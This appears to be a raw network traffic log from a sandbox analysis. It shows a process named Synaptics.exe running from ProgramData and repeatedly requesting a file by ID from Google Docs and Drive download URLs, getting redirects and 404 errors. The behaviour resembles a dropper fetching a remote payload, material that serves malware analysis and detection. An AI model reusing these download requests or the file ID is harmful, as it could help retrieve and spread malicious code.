                                                                                                                                                      2024-12-30 10:25:31 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      2024-12-30 10:25:32 UTC | 1595 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC5-FOXmNKMuQEefk0lV_xggA8s9UjUUHEo_C9hOJS_9396nxRl9GegUTMP-jElXBcPc
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:31 GMT
                                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-HC3X_SlqlQs-glgBXh25Hg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Set-Cookie: NID=520=a_A08qj7AGhwYqYPAOUWBkXuJ3nCaJEFYO5HVpg_5f_J1SpytpXqqhYmA1eULkde7NfijU2zmayf_NNrPC0XAFhoBP3NP0kzjHQ4bF2OTU18bYRtTCWpd_lRmIQiW4WcKJPz9LIuQjeL-zxZJGxrAe8xrIjEX0fLr6U4UULYJOmBGT9tLThE2bOr; expires=Tue, 01-Jul-2025 10:25:31 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:32 UTC | 1595 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fEXPO0UUj5Vy1DoFj1QDdw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                                      2024-12-30 10:25:32 UTC | 57 | IN | Data Ascii: d on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      9 | 192.168.2.11 | 49790 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:31 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      2024-12-30 10:25:32 UTC | 1595 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC6wFw-YHUbq0Ewck829n3g8QC_MvvBjv4Sq0MYzpytkfBfedxnu7iSt4vGiAvYKhito
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:32 GMT
                                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-aGM57mpJXpkSbjuhrfRPHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Set-Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT; expires=Tue, 01-Jul-2025 10:25:32 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:32 UTC | 1595 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="51-t0xPgAe_RlgeTfpxnlg">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                                      2024-12-30 10:25:32 UTC | 57 | IN | Data Ascii: d on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      10 | 192.168.2.11 | 49799 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:32 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:33 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:32 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-zJTYWg5ChWbDZR_fuBom3A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.11 | 49801 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:32 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
2024-12-30 10:25:33 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC5aEUTcnEip1TUte8B_tHQA0KCILInPpzVd_1xK7cgwoXsSLKf-hOpyichF4Pj20TlY8pNWTkg
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:32 GMT
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ocyzaAViPKhFnLXPxEOjnw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
2024-12-30 10:25:33 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:33 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="W-h7PbMC4SZCmWuh0YnAAA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:33 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.11 | 49802 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:32 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
2024-12-30 10:25:33 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:32 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-sNFoq5j1ZY-f7jHznqdJmQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.11 | 49807 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:32 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=a_A08qj7AGhwYqYPAOUWBkXuJ3nCaJEFYO5HVpg_5f_J1SpytpXqqhYmA1eULkde7NfijU2zmayf_NNrPC0XAFhoBP3NP0kzjHQ4bF2OTU18bYRtTCWpd_lRmIQiW4WcKJPz9LIuQjeL-zxZJGxrAe8xrIjEX0fLr6U4UULYJOmBGT9tLThE2bOr
2024-12-30 10:25:33 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC6n9RrkdfXLy-3tZCG04DKjEUv5EEk-7_VYA9oMVMZ8ybZSgUHfTAErIaRUzrJoLDL1AsduCnI
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:33 GMT
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-UECtAfVREZOMr9Xn0W_v0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
2024-12-30 10:25:33 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:33 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="b_B-uEB53Bf8wsto0um2xg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:33 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.11 | 49826 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:34 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
2024-12-30 10:25:34 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:34 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-snEbz6dSOTd-Y1VwLVTuSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      15 | 192.168.2.11 | 49825 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:34 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:34 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:34 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-9DLlJZEIeKvqsz0_W-G8mQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      16 | 192.168.2.11 | 49839 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:35 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-12-30 10:25:35 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:35 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-K28ok_R8gVVk5QtB3FuRSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      17 | 192.168.2.11 | 49838 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:35 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:35 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC4RftOGOtjsk7viJeMqoRS6gk8BUHgvfG7UV8-E2cnQ9apP_KnrvZ1lPwX_DWj1Id0Ww-eMjLQ
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:35 GMT
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-MBY9hWYplAAUay8gls1nnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:35 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
